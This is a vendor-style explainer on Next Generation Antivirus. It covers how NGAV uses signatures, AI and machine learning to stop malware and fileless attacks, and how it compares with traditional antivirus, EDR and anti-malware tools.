Next Generation Antivirus is considered a step forward in antivirus (AV) solutions capabilities, and leverages known, signature-based prevention techniques in combination with extended detection and response (XDR) capabilities that incorporate artificial intelligence (AI) and/or machine learning (ML). By leveraging advanced analytics to correlate alerts from multiple telemetry sources, NGAV quickly identifies actionable threat intelligence to anticipate and prevent threats faster.
NGAV is deployed in the form of cloud-based software that has a lighter impact on systems and endpoints, and is increasingly the more common type of AV in organizations and enterprises.
In a sense, when XDR and NGAV work together, they are both protecting the network perimeter and extending threat-detection techniques beyond it. EDR happens at the endpoint that lies inside of that security perimeter. Bad actors could still find a way to an endpoint like a phone or laptop, so a good EDR solution is a last line of defense.
Again, it's the broad versus the specific here. As mentioned above, a modern NGAV solution is designed to leverage advanced analytics to secure, anticipate, and defend against threats at and beyond the network perimeter. Anti-malware solutions are primarily designed to scan individual systems for malware built to bypass security controls.
NGAV works by detecting and preventing malware and fileless attacks. It leverages pre-execution methodologies to protect against tactics, techniques, and procedures (TTPs) and malicious behavior used with purpose by bad actors or unwittingly by someone who is properly credentialed. Let’s take a closer look at how an NGAV solution accomplishes its detection and prevention goals:
Providers of NGAV solutions and services typically design the technology to be rapidly launched and operating in such a way as not to hinder performance of network systems or endpoints.
When we talk about NGAV, those last two letters still loom large within culture. The term “antivirus” has been a part of computer-using society for decades, so it bears asking the question: What exactly are the differences between modern NGAV and traditional perceptions of AV?
AV primarily focuses on protecting the endpoint and/or quickly removing an affected device that may be part of a larger critical infrastructure, thus causing potentially larger disruption among unaffected devices. This could lead to a business enduring significant financial and reputational damage.
NGAV moves beyond these traditional AV processes, blocking diverse attacks – including fileless malware – across the entire endpoint ecosystem. NGAV’s main goal is to detect and prevent attacks from reaching critical endpoints all over the network. Not only that: Via ML and AI learning, it can help put a stop to evasive actions. More detection technology won’t solve the problem of malware and other threats, rather it’s smarter detection focused on prevention that will put attackers on the defensive.
One last key difference is focused on the previously mentioned concept of learning. Traditional AV can be heavy on an endpoint, meaning it doesn’t really have the capability to adapt to a system’s unique behaviors – it is what it is, and that’s all it will ever be. NGAV, on the other hand, can learn from past behaviors of the endpoints, systems, and networks on which it’s installed. This is why it’s so adept at detecting evasive actions and blocking threats much earlier in the killchain than was heretofore possible.
The benefits of NGAV are numerous compared to traditional AV, and can accelerate an organization's network detection and response (NDR) program.
For businesses and security organizations to stand against modern threats, they must attempt to outpace bad-actor use of NGAV-thwarting technology. This includes blocking known and unknown threats sooner in the killchain, cutting off endpoint and deep-system access, or even preventing network access entirely. Traditional AV typically uses signature-based detection methods whereas NGAV leverages a combination of signature-based detection, AI, and ML to surface the TTPs used by today’s attackers.
As previously mentioned, ML and AI impart NGAV solutions with the ability to adapt to specific behaviors in systems they’re tasked with protecting. This helps analysts to gain a deeper understanding of their endpoints and network systems so they can defend against threats and design better protections based on telemetry that could indicate impending attacks.
NGAV solutions are generally designed to be lightweight, add-on technology that won’t slow down system operations – and therefore security personnel productivity. It typically has a small footprint that can deploy quickly, drive key insights, and enable faster mean-time-to-respond (MTTR) with actions like automated-asset and process containment.
With lower operational costs, more efficient threat intelligence and detection capabilities, and comprehensive coverage, NGAV solutions are typically ideal for security professionals looking to further consolidate across the tech stack. As a value-add for an existing detection and response (D&R) solution an organization may already have, NGAV can accelerate the breaking down of silos between security practices. This can be a productivity, efficiency, and growth driver for security operations centers (SOCs) that may already be stretched thin.
As with any solution – especially shopping for one within a category that has the buzzy phrase “next gen” in its name – there are many options and potential vendors. So, it’s best to know how to find one that can tailor an NGAV solution to your unique environment.
Antivirus: Latest Rapid7 Blog Posts
Rapid7 Research: Encapsulating Antivirus (AV) Evasion Techniques in Metasploit Framework